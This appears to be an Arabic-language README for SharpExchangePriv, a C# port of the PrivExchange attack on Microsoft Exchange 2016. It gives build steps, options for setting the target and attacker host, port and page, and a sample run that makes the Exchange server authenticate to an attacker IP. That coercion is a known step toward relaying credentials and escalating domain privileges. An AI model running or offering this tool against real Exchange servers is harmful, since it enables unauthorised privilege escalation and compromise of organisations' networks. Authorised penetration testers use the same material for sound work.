
تنفيذ بلغة C# لأداة PrivExchange من @_dirkjan.
تنفيذ بلغة C# لأداة PrivExchange بواسطة @_dirkjan. الشكر موصول لـ @g0ldenGunSec، حيث اعتمدت على كوده.
تم اختباره ضد Exchange 2016.
تم بناء SharpExchangePriv باستخدام .NET 3.5 وهو متوافق مع Visual Studio 2017. ما عليك سوى فتح ملف الحل وبناء المشروع.
استخدمت CommandLineParser لتحليل الوسائط. سيؤدي ذلك إلى إنشاء ملف CommandLine.dll بالإضافة إلى الملف التنفيذي. يمكنك ببساطة دمج الملف .exe و .dll في ملف تنفيذي واحد:
ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll
--targetHostتعيين عنوان IP للمضيف الهدف.
--attackerHostتعيين عنوان IP للمهاجم.
--attackerPortتعيين منفذ المهاجم.
--attackerPageتعيين صفحة المهاجم.
--sslتمكين SSL.
--exchangeVersionتعيين إصدار Exchange، الافتراضي هو 2016.
--exchangePortتعيين منفذ Exchange الهدف.
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
/$$$$$$$ /$$ /$$$$$$$$ /$$
| $$__ $$ |__/ | $$_____/ | $$
| $$ \ $$ /$$$$$$ /$$ /$$ /$$| $$ /$$ /$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$
| $$$$$$$//$$__ $$| $$| $$ /$$/| $$$$$ | $$ /$$/ /$$_____/| $$__ $$ |____ $$| $$__ $$ /$$__ $$ /$$__ $$
| $$____ /| $$ \__ /| $$ \ $$/$$/ | $$__ / \ $$$$/ | $$ | $$ \ $$ /$$$$$$$| $$ \ $$| $$ \ $$| $$$$$$$$
| $$ | $$ | $$ \ $$$/ | $$ >$$ $$ | $$ | $$ | $$ /$$__ $$| $$ | $$| $$ | $$| $$_____ /
| $$ | $$ | $$ \ $/ | $$$$$$$$ /$$/\ $$| $$$$$$$| $$ | $$| $$$$$$$| $$ | $$| $$$$$$$| $$$$$$$
|__/ |__/ |__/ \_/ |________/|__/ \__/ \_______/|__/ |__/ \_______/|__/ |__/ \____ $$ \_______/
/$$ \ $$
| $$$$$$/
\______ /
@den_n1s
The target URL is https://192.168.11.10:443/EWS/Exchange.asmx
Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx
HTTP 200 response received, the target Exchange server should be authenticating shortly.
يرجى تقديم أي أخطاء في صفحة مشروع Github أو التواصل معي على تويتر @den_n1s